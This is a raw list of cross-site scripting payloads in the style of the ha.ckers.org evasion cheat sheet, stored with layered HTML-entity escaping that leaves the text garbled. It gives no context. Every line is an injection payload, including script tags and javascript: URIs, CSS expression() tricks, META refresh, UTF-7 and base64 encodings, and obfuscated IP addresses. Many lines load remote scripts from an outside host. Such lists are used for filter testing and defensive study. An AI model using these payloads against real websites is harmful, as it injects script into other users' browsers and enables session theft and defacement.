&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
